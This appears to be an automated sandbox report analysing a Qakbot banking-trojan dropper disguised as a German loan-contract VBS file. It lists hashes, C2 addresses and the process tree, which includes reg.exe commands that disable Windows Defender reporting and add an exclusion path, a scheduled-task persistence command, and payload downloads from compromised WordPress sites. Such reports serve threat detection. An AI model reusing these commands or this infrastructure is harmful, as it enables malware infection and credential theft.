Overview

overview

10

Static

static

galadriel

windows7_x64

10

Resubmissions

19/05/2020, 13:04 UTC

200519-7d9ja2krwe 10

19/05/2020, 12:28 UTC

200519-4h8rvftfme 8

Analysis

  • max time kernel
    255s
  • max time network
    144s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    19/05/2020, 13:04 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Darlehensvertrag_42816504192_15052020.vbs

  • Size

    36.2MB

  • MD5

    e44fb6c9a050ae7ef4b55cce6a71cdcd

  • SHA1

    dd77b217e503fddaf28bb60b6e3280a692807976

  • SHA256

    c888b058cd85352ec803eb2a6e78bef567b844e9982176efbcd7074982a760de

  • SHA512

    9524cdd296cb89eb1cc8a160a62337a908990aa1e6d84b0e51c1827bec705331f458c0713d64cfe221a55ad32331db74a8e9ff4a356d6b2fb515b464e3804ab5

Score
10/10
evasiontrojanbankerstealerqakbot

Malware Config

Extracted

Family

qakbot

Botnet

spx121

Campaign

1589802571

C2

72.209.191.27:443

72.204.242.138:443

47.202.98.230:443

72.204.242.138:465

96.35.170.82:2222

96.56.237.174:465

65.60.228.130:443

76.187.8.160:443

79.101.206.85:995

64.19.74.29:995

84.117.60.157:443

94.176.128.176:443

72.204.242.138:32102

187.155.61.44:443

72.204.242.138:443

73.163.242.114:443

86.127.7.148:21

76.187.97.98:2222

82.178.63.31:443

174.52.64.212:443

Signatures

  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Windows security modification 2 TTPs 6 IoCs
    evasiontrojan
  • Windows security bypass 2 TTPs 2 IoCs
    evasiontrojan
  • Runs ping.exe 1 TTPs 1 IoCs
  • Qakbot/Qbot

    Qbot or Qakbot is a sophisticated worm with banking capabilities.

    trojanbankerstealerqakbot
  • Executes dropped EXE 7 IoCs
  • Suspicious use of WriteProcessMemory 81 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Loads dropped DLL 4 IoCs
  • Turns off Windows Defender SpyNet reporting 6 IoCs
  • Modifies data under HKEY_USERS 3 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Blacklisted process makes network request 4 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Darlehensvertrag_42816504192_15052020.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Blacklisted process makes network request
    PID:1068
    • C:\Users\Admin\AppData\Local\Temp\PicturesViewer.exe
      C:\Users\Admin\AppData\Local\Temp\PicturesViewer.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      • Suspicious behavior: EnumeratesProcesses
      • Loads dropped DLL
      PID:1884
      • C:\Users\Admin\AppData\Local\Temp\PicturesViewer.exe
        C:\Users\Admin\AppData\Local\Temp\PicturesViewer.exe /C
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        PID:1608
      • C:\Users\Admin\AppData\Roaming\Microsoft\Acsubziue\wnieyjug.exe
        C:\Users\Admin\AppData\Roaming\Microsoft\Acsubziue\wnieyjug.exe
        3⤵
        • Suspicious behavior: MapViewOfSection
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        • Suspicious behavior: EnumeratesProcesses
        PID:1572
        • C:\Users\Admin\AppData\Roaming\Microsoft\Acsubziue\wnieyjug.exe
          C:\Users\Admin\AppData\Roaming\Microsoft\Acsubziue\wnieyjug.exe /C
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          PID:1964
        • C:\Windows\SysWOW64\explorer.exe
          C:\Windows\SysWOW64\explorer.exe
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:1956
      • C:\Windows\SysWOW64\schtasks.exe
        "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn vibhuwyoc /tr "\"C:\Users\Admin\AppData\Local\Temp\PicturesViewer.exe\" /I vibhuwyoc" /SC ONCE /Z /ST 15:09 /ET 15:21
        3⤵
        • Creates scheduled task(s)
        PID:1936
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {993A98C4-DF39-4597-990B-D65ECEADDFDC} S-1-5-18:NT AUTHORITY\System:Service:
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1200
    • C:\Users\Admin\AppData\Local\Temp\PicturesViewer.exe
      C:\Users\Admin\AppData\Local\Temp\PicturesViewer.exe /I vibhuwyoc
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      • Suspicious behavior: EnumeratesProcesses
      • Loads dropped DLL
      • Modifies data under HKEY_USERS
      PID:1028
      • C:\Windows\system32\reg.exe
        C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SpyNetReporting" /d "0"
        3⤵
        • Windows security modification
        • Turns off Windows Defender SpyNet reporting
        PID:1692
      • C:\Windows\system32\reg.exe
        C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SubmitSamplesConsent" /d "2"
        3⤵
        • Windows security modification
        • Turns off Windows Defender SpyNet reporting
        PID:516
      • C:\Windows\system32\reg.exe
        C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SpyNetReporting" /d "0"
        3⤵
          PID:1448
        • C:\Windows\system32\reg.exe
          C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SubmitSamplesConsent" /d "2"
          3⤵
            PID:1512
          • C:\Windows\system32\reg.exe
            C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\SpyNet" /f /t REG_DWORD /v "SpyNetReporting" /d "0"
            3⤵
            • Windows security modification
            • Turns off Windows Defender SpyNet reporting
            PID:1020
          • C:\Windows\system32\reg.exe
            C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\SpyNet" /f /t REG_DWORD /v "SubmitSamplesConsent" /d "2"
            3⤵
            • Windows security modification
            • Turns off Windows Defender SpyNet reporting
            PID:2008
          • C:\Windows\system32\reg.exe
            C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet" /f /t REG_DWORD /v "SpyNetReporting" /d "0"
            3⤵
            • Windows security modification
            • Turns off Windows Defender SpyNet reporting
            PID:1764
          • C:\Windows\system32\reg.exe
            C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet" /f /t REG_DWORD /v "SubmitSamplesConsent" /d "2"
            3⤵
            • Windows security modification
            • Turns off Windows Defender SpyNet reporting
            PID:1180
          • C:\Windows\system32\reg.exe
            C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /t REG_DWORD /v "C:\Users\Admin\AppData\Roaming\Microsoft\Acsubziue" /d "0"
            3⤵
            • Windows security bypass
            PID:1456
          • C:\Users\Admin\AppData\Roaming\Microsoft\Acsubziue\wnieyjug.exe
            C:\Users\Admin\AppData\Roaming\Microsoft\Acsubziue\wnieyjug.exe
            3⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            PID:484
            • C:\Users\Admin\AppData\Roaming\Microsoft\Acsubziue\wnieyjug.exe
              C:\Users\Admin\AppData\Roaming\Microsoft\Acsubziue\wnieyjug.exe /C
              4⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              PID:952
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c ping.exe -n 6 127.0.0.1 & type "C:\Windows\System32\calc.exe" > "C:\Users\Admin\AppData\Local\Temp\PicturesViewer.exe"
            3⤵
              PID:1824
              • C:\Windows\system32\PING.EXE
                ping.exe -n 6 127.0.0.1
                4⤵
                • Runs ping.exe
                PID:864
            • C:\Windows\system32\schtasks.exe
              "C:\Windows\system32\schtasks.exe" /DELETE /F /TN vibhuwyoc
              3⤵
                PID:1760

          Network

          • flag-unknown
            DNS
            same-way.com
            Remote address:
            8.8.8.8:53
            Request
            same-way.com
            IN A
            Response
            same-way.com
            IN A
            46.250.210.61
          • flag-unknown
            GET
            http://same-way.com/new/sameway_web/wp-content/plugins/themeisle-companion/vendor/tubalmartin/cssmin/gui/third-party/bootstrap/css/jsc/333333.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA
            WScript.exe
            Remote address:
            46.250.210.61:80
            Request
            GET /new/sameway_web/wp-content/plugins/themeisle-companion/vendor/tubalmartin/cssmin/gui/third-party/bootstrap/css/jsc/333333.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
            Connection: Keep-Alive
            Accept: */*
            Accept-Language: en-us
            User-Agent: MontegoMontego
            Host: same-way.com
            Response
            HTTP/1.1 404 Not Found
            Date: Tue, 19 May 2020 13:05:36 GMT
            Server: Apache
            Expires: Wed, 11 Jan 1984 05:00:00 GMT
            Cache-Control: no-cache, must-revalidate, max-age=0
            Link: <http://same-way.com/wp-json/>; rel="https://api.w.org/"
            Set-Cookie: cookielawinfo-checkbox-necessary=yes; expires=Tue, 19-May-2020 14:05:36 GMT; Max-Age=3600; path=/
            Set-Cookie: cookielawinfo-checkbox-non-necessary=yes; expires=Tue, 19-May-2020 14:05:36 GMT; Max-Age=3600; path=/
            Upgrade: h2,h2c
            Connection: Upgrade, Keep-Alive
            Strict-Transport-Security: max-age=15768000
            Keep-Alive: timeout=5, max=100
            Transfer-Encoding: chunked
            Content-Type: text/html; charset=UTF-8
          • flag-unknown
            DNS
            fifa.legavirtuale.com
            Remote address:
            8.8.8.8:53
            Request
            fifa.legavirtuale.com
            IN A
            Response
            fifa.legavirtuale.com
            IN A
            149.202.157.236
          • flag-unknown
            GET
            http://fifa.legavirtuale.com/campionati/_mmServerScripts/_notes/jsc/333333.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA
            WScript.exe
            Remote address:
            149.202.157.236:80
            Request
            GET /campionati/_mmServerScripts/_notes/jsc/333333.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
            Connection: Keep-Alive
            Accept: */*
            Accept-Language: en-us
            User-Agent: MontegoMontego
            Host: fifa.legavirtuale.com
          • flag-unknown
            DNS
            kavin.chenabfoods.co.uk
            Remote address:
            8.8.8.8:53
            Request
            kavin.chenabfoods.co.uk
            IN A
            Response
            kavin.chenabfoods.co.uk
            IN A
            149.255.59.15
          • flag-unknown
            GET
            http://kavin.chenabfoods.co.uk/wp-content/plugins/updraftplus/vendor/guzzle/guzzle/src/Guzzle/Service/Command/LocationVisitor/Request/jsc/333333.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA
            WScript.exe
            Remote address:
            149.255.59.15:80
            Request
            GET /wp-content/plugins/updraftplus/vendor/guzzle/guzzle/src/Guzzle/Service/Command/LocationVisitor/Request/jsc/333333.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
            Connection: Keep-Alive
            Accept: */*
            Accept-Language: en-us
            User-Agent: MontegoMontego
            Host: kavin.chenabfoods.co.uk
            Response
            HTTP/1.1 302 Found
            Date: Tue, 19 May 2020 13:06:06 GMT
            Server: Apache
            Location: http://kavin.chenabfoods.co.uk/cgi-sys/suspendedpage.cgi?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA
            Content-Length: 333
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: text/html; charset=iso-8859-1
          • flag-unknown
            GET
            http://kavin.chenabfoods.co.uk/cgi-sys/suspendedpage.cgi?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA
            WScript.exe
            Remote address:
            149.255.59.15:80
            Request
            GET /cgi-sys/suspendedpage.cgi?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
            Connection: Keep-Alive
            Accept: */*
            Accept-Language: en-us
            User-Agent: MontegoMontego
            Host: kavin.chenabfoods.co.uk
            Response
            HTTP/1.1 200 OK
            Date: Tue, 19 May 2020 13:06:06 GMT
            Server: Apache
            Keep-Alive: timeout=5, max=99
            Connection: Keep-Alive
            Transfer-Encoding: chunked
            Content-Type: text/html
          • flag-unknown
            DNS
            beelif.com
            Remote address:
            8.8.8.8:53
            Request
            beelif.com
            IN A
            Response
            beelif.com
            IN A
            103.124.93.136
          • flag-unknown
            GET
            http://beelif.com/wp-content/themes/flatsome/inc/admin/kirki/assets/js/vendor/codemirror/mode/textile/jsc/333333.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA
            WScript.exe
            Remote address:
            103.124.93.136:80
            Request
            GET /wp-content/themes/flatsome/inc/admin/kirki/assets/js/vendor/codemirror/mode/textile/jsc/333333.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
            Connection: Keep-Alive
            Accept: */*
            Accept-Language: en-us
            User-Agent: MontegoMontego
            Host: beelif.com
            Response
            HTTP/1.1 200 OK
            Server: nginx/1.17.10
            Date: Tue, 19 May 2020 13:06:15 GMT
            Content-Type: image/png
            Content-Length: 704000
            Connection: keep-alive
            X-Powered-By: PHP/5.4.16
            Accept-Ranges: bytes
            Expires: 0
            Cache-Control: no-cache, no-store, must-revalidate
            Content-Disposition: attachment; filename="333333.png"
          • 46.250.210.61:80
            http://same-way.com/new/sameway_web/wp-content/plugins/themeisle-companion/vendor/tubalmartin/cssmin/gui/third-party/bootstrap/css/jsc/333333.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA
            http
            WScript.exe
            1.5kB
             51.7kB
             25
            39

            HTTP Request

            GET http://same-way.com/new/sameway_web/wp-content/plugins/themeisle-companion/vendor/tubalmartin/cssmin/gui/third-party/bootstrap/css/jsc/333333.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA

            HTTP Response

            404
          • 149.202.157.236:80
            http://fifa.legavirtuale.com/campionati/_mmServerScripts/_notes/jsc/333333.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA
            http
            WScript.exe
            462 B
             92 B
             4
            2

            HTTP Request

            GET http://fifa.legavirtuale.com/campionati/_mmServerScripts/_notes/jsc/333333.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA
          • 149.255.59.15:80
            http://kavin.chenabfoods.co.uk/cgi-sys/suspendedpage.cgi?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA
            http
            WScript.exe
            1.1kB
             9.1kB
             10
            14

            HTTP Request

            GET http://kavin.chenabfoods.co.uk/wp-content/plugins/updraftplus/vendor/guzzle/guzzle/src/Guzzle/Service/Command/LocationVisitor/Request/jsc/333333.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA

            HTTP Response

            302

            HTTP Request

            GET http://kavin.chenabfoods.co.uk/cgi-sys/suspendedpage.cgi?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA

            HTTP Response

            200
          • 103.124.93.136:80
            http://beelif.com/wp-content/themes/flatsome/inc/admin/kirki/assets/js/vendor/codemirror/mode/textile/jsc/333333.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA
            http
            WScript.exe
            12.0kB
             723.9kB
             254
            489

            HTTP Request

            GET http://beelif.com/wp-content/themes/flatsome/inc/admin/kirki/assets/js/vendor/codemirror/mode/textile/jsc/333333.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA

            HTTP Response

            200
          • 8.8.8.8:53
            same-way.com
            dns
            58 B
             74 B
             1
            1

            DNS Request

            same-way.com

            DNS Response

            46.250.210.61

          • 8.8.8.8:53
            fifa.legavirtuale.com
            dns
            67 B
             83 B
             1
            1

            DNS Request

            fifa.legavirtuale.com

            DNS Response

            149.202.157.236

          • 239.255.255.250:1900
            966 B
             6
          • 8.8.8.8:53
            kavin.chenabfoods.co.uk
            dns
            69 B
             85 B
             1
            1

            DNS Request

            kavin.chenabfoods.co.uk

            DNS Response

            149.255.59.15

          • 8.8.8.8:53
            beelif.com
            dns
            56 B
             72 B
             1
            1

            DNS Request

            beelif.com

            DNS Response

            103.124.93.136

          • 239.255.255.250:1900

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • memory/952-18-0x00000000022E0000-0x00000000022F1000-memory.dmp

            Filesize

            68KB

            Download

          • memory/1068-1-0x0000000002FB0000-0x0000000002FB4000-memory.dmp

            Filesize

            16KB

            Download

          • memory/1572-12-0x00000000002F0000-0x000000000032A000-memory.dmp

            Filesize

            232KB

            Download

          • memory/1608-5-0x0000000002350000-0x0000000002361000-memory.dmp

            Filesize

            68KB

            Download

          • memory/1964-11-0x0000000002320000-0x0000000002331000-memory.dmp

            Filesize

            68KB

            Download

          We care about your privacy.

          This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.